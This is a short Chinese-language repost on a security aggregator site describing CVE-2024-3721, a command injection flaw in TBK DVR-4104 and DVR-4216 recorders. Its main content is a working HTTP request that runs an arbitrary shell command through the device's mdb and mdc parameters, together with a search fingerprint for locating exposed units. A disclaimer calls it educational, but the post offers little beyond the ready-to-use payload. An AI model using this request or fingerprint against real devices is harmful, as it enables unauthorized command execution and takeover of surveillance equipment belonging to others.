CTF导航 CTF导航

TBK DVR硬盘录像机 任意命令执行漏洞 CVE-2024-3721

渗透技巧 3个月前 admin
131 0 0

漏洞名称

TBK DVR硬盘录像机 任意命令执行漏洞 CVE-2024-3721


漏洞复现

1、替换需要执行的命令,发送请求

GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=ls HTTP/1.1Cookie: uid=xxxHost: 1.1.1.1


搜索指纹

“Location: /login.rsp”


利用条件

TBK DVR-4104

TBK DVR-4216

TBK DVR硬盘录像机 任意命令执行漏洞 CVE-2024-3721


免责声明



本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。


长按下方二维码,关注巨黑科,学习漏洞信息!

原文始发于微信公众号(巨黑科):TBK DVR硬盘录像机 任意命令执行漏洞 CVE-2024-3721

版权声明:admin 发表于 2024年5月11日 上午8:01。
转载请注明:TBK DVR硬盘录像机 任意命令执行漏洞 CVE-2024-3721 | CTF导航

相关文章

使用doop识别最近commons text漏洞的污点信息流
admin
519
使用 Microsoft Entra 临时访问通行证进行横向移动和本地 NT 哈希转储
admin
53
Cobalt Strike快乐星球
admin
1,003
从登录会话看AD域分层管理模型
admin
42
PHP Phar反序列化浅学习
admin
1,229
Top disclosed reports from HackerOne
admin
383

相关文章

WhatsApp中的双重释放漏洞如何转变为RCE
0
帆软报表最新前台SQL漏洞复现
0
Cobalt Strike 有效负载将恶意 JavaScript 注入 PDF
0
SolarWinds Serv-U(CVE-2024-28995)
0
CVE-2024-36401 JDK 11-22 通杀内存马
0
注入 Java 内存有效载荷以进行后期利用
0
VMware vCenter RCE CVE-2024-22274 细节公开 !
0
某软Report高版本中利用的一些细节
0
Apache两个高危漏洞poc预警CVE-2024-40725 & CVE-2024-40898
0
警惕伪装成CrowdStrike修复方法相关的钓鱼活动
0